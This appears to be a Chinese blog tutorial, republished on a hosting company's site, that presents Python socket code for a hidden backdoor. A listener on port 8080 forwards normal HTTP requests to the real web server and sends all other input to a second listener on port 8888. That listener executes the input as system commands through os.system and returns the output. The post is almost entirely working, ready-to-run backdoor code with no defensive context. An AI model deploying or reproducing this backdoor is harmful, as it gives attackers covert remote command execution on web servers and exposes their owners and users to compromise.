思想:
用户正常浏览器访问请求通过8080端口,请求若为http请求,则正常转发到80端口保证网站正常运行。否则转发到8888端口执行系统命令。
8888端口监听代码:
#!/usr/bin/env python from socket import * import os HOST='127.0.0.1' PORT=8888 BUFSIZE=1024 ADDR=(HOST,PORT) tcpSerSock = socket(AF_INET,SOCK_STREAM) tcpSerSock.setsockopt(SOL_SOCKET,SO_REUSEADDR,1) tcpSerSock.bind(ADDR) tcpSerSock.listen(5) while True: print("waiting for connection...") tcpCliSock,addr = tcpSerSock.accept() print("...connected from:",addr) while True: data=tcpCliSock.recv(BUFSIZE) if not data: break info = data.split('\n') command = info[0] try: os.system(command + " > command.txt"); file = open('command.txt') data ="" for line in file: data=data+line; tcpCliSock.send(data) except Exception: tcpCliSock.send("Nothing to do") tcpCliSock.close() tcpSerSock.close()
8080端口转发代码:
#!/usr/bin/python from socket import * tcp1 = socket(AF_INET,SOCK_STREAM) tcp1.setsockopt(SOL_SOCKET,SO_REUSEADDR,1) tcp1.bind(('0.0.0.0',8080)) tcp1.listen(10) BUFFER_SIZE=2048 tcpCliSock,addr = tcp1.accept() while True: data = tcpCliSock.recv(BUFFER_SIZE) if 'HTTP' in data: tcp3 = socket(AF_INET,SOCK_STREAM) tcp3.setsockopt(SOL_SOCKET,SO_REUSEADDR,1) tcp3.connect(('127.0.0.1',80)) tcp3.send(data) htmlinfo = tcp3.recv(2048) if not htmlinfo: tcp3.close() else: tcpCliSock.send(htmlinfo) else: tcp2 = socket(AF_INET,SOCK_STREAM) tcp2.setsockopt(SOL_SOCKET,SO_REUSEADDR,1) tcp2.connect(('127.0.0.1',8888)) data = data.replace("\n"," ") print data tcp2.send(data) commandinfo = tcp2.recv(1024) tcpCliSock.send(commandinfo) tcp2.close() tcpCliSock.close() tcp1.close()
有些地方还有些小问题等待修正,但是linux下是可以完美运行的。欢迎学习交流。
以上这篇python基于socket进行端口转发实现后门隐藏的示例就是小编分享给大家的全部内容了,希望能给大家一个参考,也希望大家多多支持亿速云。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。